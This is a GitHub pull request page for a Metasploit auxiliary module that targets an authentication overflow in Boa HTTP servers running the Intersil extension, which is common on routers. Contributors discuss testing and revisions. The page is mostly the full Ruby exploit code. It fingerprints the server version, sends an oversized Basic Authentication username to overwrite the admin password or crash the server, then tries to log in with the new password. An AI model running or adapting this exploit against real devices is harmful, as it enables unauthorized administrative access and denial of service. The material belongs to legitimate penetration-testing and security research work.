Skip to content

HTTPS clone URL

Subversion checkout URL

You can clone with HTTPS or Subversion.

Download ZIP

Loading…

Boa HTTPd Basic Authentication Overflow #453

Closed
wants to merge 9 commits into from

2 participants

@mdietz94

Boa HTTP Server 0.93.x - 0.94.11 built with Intersil (i.e. common routers) allows denial of service or possibly authentication bypass via a Basic Authentication header with a user string greater than 127 characters. You must set the request URI to the directory that requires basic authentication. Depending on the version of the server either the administrator password will be overwritten in memory or the web server will be shut down.

@wchen-r7
Collaborator

Hi there,

Could you please run msftidy.rb on your module? It will tell you which line should be corrected. Also, please make sure you're using hard tabs instead of spaces for indentation. You're using spaces mostly. When you're done, please remember to do another push for this branch.

Thanks.

@wchen-r7
Collaborator

How do you configure basic auth for BOA? I see that there's a send_r_unauthorized() function defined in the source, but it's actually not used anywhere. This web server dev work looks incomplete.

@mdietz94

The actual vulnerability is not inside Boa, but inside Intersil (a firmware boa frequently runs on) that are used for basic authentication by boa servers. It is used frequently on routers and the like. The page for Intersil is http://isl3893.sourceforge.net/ . If you are having problems testing it I can post some packet captures or something.

@wchen-r7
Collaborator

Actually, yeah, a pcap would be great! Could you please e-mail it to msfdev[at]metasploit.com? Thanks!

@mdietz94

Sounds great, I'm out of town and won't be back until Friday, so I should be able to send you the pcap file over the weekend.

@wchen-r7
Collaborator

Wonder, thanks! Holding it in the untested branch (aka the incomplete branch) for now, and then I'll move it to master once I get the pcap.

Cheers!

@wchen-r7
Collaborator

Placed it in here for now:
https://github.com/rapid7/metasploit-framework/blob/unstable/unstable-modules/auxiliary/boa_auth_dos.rb

Will reopen this weekend. Thanks again!

@wchen-r7 wchen-r7 closed this
@wchen-r7 wchen-r7 reopened this
@wchen-r7
Collaborator

Got a pcap. Reopened.

@wchen-r7 wchen-r7 referenced this pull request from a commit in wchen-r7/metasploit-framework
@sinn3r sinn3r Add Intersil HTTP Basic auth pass reset (originally #453)
The modified version of pull request #453. This addresses a couple
of things including:
* Change the description to better explain what the vulnerability is.
  The advisory focuses the problem as an auth bypass, not DoS,
  although it can end up dosing the server.
* The title and filename are changed as a result of matching that
  advisory's description.
* Use 'TARGETURI' option instead of 'URI'.
* The reset attempt needs to check if the directory actually has
  401 in place, otherwise this may result a false-positive.
* The last HTTP request needs to check a possible nil return value.
* More verbose outputs.
e72303a
@wchen-r7
Collaborator

Committed as #453: e72303a

@wchen-r7 wchen-r7 closed this
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Commits on Jun 6, 2012
  1. @mdietz94

    added Boa HTTPd DoS

    mdietz94 authored
  2. @mdietz94

    fixed description

    mdietz94 authored
Commits on Jun 7, 2012
  1. @mdietz94

    realized ranking was only for exploits, added output to aid with chec…

    mdietz94 authored
    …king whether or not the password was changed or denial of service was achieved. also added some error handling
  2. @mdietz94

    realized ranking was only for exploits, added output to aid with chec…

    mdietz94 authored
    …king whether or not the password was changed or denial of service was achieved. also added some error handling
  3. @mdietz94
  4. @mdietz94

    whitespace cleanup

    mdietz94 authored
  5. @mdietz94
  6. @mdietz94
Commits on Jun 8, 2012
  1. @mdietz94
This page is out of date. Refresh to see the latest.
Showing with 99 additions and 0 deletions.
  1. +99 −0 modules/auxiliary/dos/http/boa_auth_dos.rb
View
99 modules/auxiliary/dos/http/boa_auth_dos.rb
@@ -0,0 +1,99 @@
+##
+# $Id: boa_auth_dos.rb 15014 2012-06-06 15:13:11Z rapid7 $
+##
+
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Dos
+
+ def initialize(info = {})
+ super(update_info(info,
+ 'Name' => 'Boa HTTPd Basic Authentication Overflow',
+ 'Description' =>
+ %q{
+ The Intersil extention in the Boa HTTP Server 0.93.x - 0.94.11
+ allows denial of service or possibly authentication bypass
+ via a Basic Authentication header with a user string greater than 127 characters. You must set
+ the request URI to the directory that requires basic authentication.
+ },
+ 'Author' =>
+ [
+ 'Luca "ikki" Carettoni <luca.carettoni[at]securenetwork.it>', #original discoverer
+ 'Claudio "paper" Merloni <claudio.merloni[at]securenetwork.it>', #original discoverer
+ 'Max Dietz <maxwell.r.dietz[at]gmail.com>' #metasploit module
+ ],
+ 'License' => MSF_LICENSE,
+ 'Version' => '$Revision$',
+ 'References' =>
+ [
+ [ 'URL', 'http://packetstormsecurity.org/files/59347/boa-bypass.txt.html'],
+ ],
+ 'DisclosureDate' => 'Sep 10 2007'))
+
+ register_options(
+ [
+ Opt::RPORT(80),
+ OptString.new('URI', [ true, "The request URI", '/']),
+ OptString.new('PASSWORD', [true, 'The password to set (if possible)', 'pass'])
+ ], self.class)
+ end
+
+ def check
+ begin
+ res = send_request_cgi({
+ 'uri'=>'/',
+ 'method'=>'GET'
+ })
+ if (res and (m = res.headers['Server'].match(/Boa\/(.*)/)))
+ print_status("Boa Version Detected: #{m[1]}")
+ return Exploit::CheckCode::Safe if (m[1][0].ord-48>0) # boa server wrong version
+ return Exploit::CheckCode::Safe if (m[1][3].ord-48>4)
+ return Exploit::CheckCode::Vulnerable
+ else
+ print_status("Not a Boa Server!")
+ return Exploit::CheckCode::Safe # not a boa server
+ end
+ rescue Rex::ConnectionRefused
+ print_error("Connection refused by server.")
+ return Exploit::CheckCode::Safe
+ end
+ end
+
+ def run
+ if check == Exploit::CheckCode::Vulnerable
+ datastore['BasicAuthUser'] = Rex::Text.rand_text_alpha(127)
+ datastore['BasicAuthPass'] = datastore['PASSWORD']
+ res = send_request_cgi({
+ 'uri'=> datastore['URI'],
+ 'method'=>'GET'
+ })
+ if (res != nil)
+ print_status("Server still operational... checking to see if password has been overwritten.")
+ datastore['BasicAuthUser'] = 'admin'
+ res = send_request_cgi({
+ 'uri'=>datastore['URI'],
+ 'method'=>'GET'
+ })
+ if (res.code == 200)
+ print_status("Access successful with admin:#{datastore['PASSWORD']}")
+ elsif (res.code != 401)
+ print_status("Access not forbidden, but another error has occured: Code #{res.code} encountered")
+ else
+ print_status("Access forbidden, this module has failed.")
+ end
+ else
+ print_status("Denial of Service has succeeded.")
+ end
+ end
+ end
+end
Something went wrong with that request. Please try again.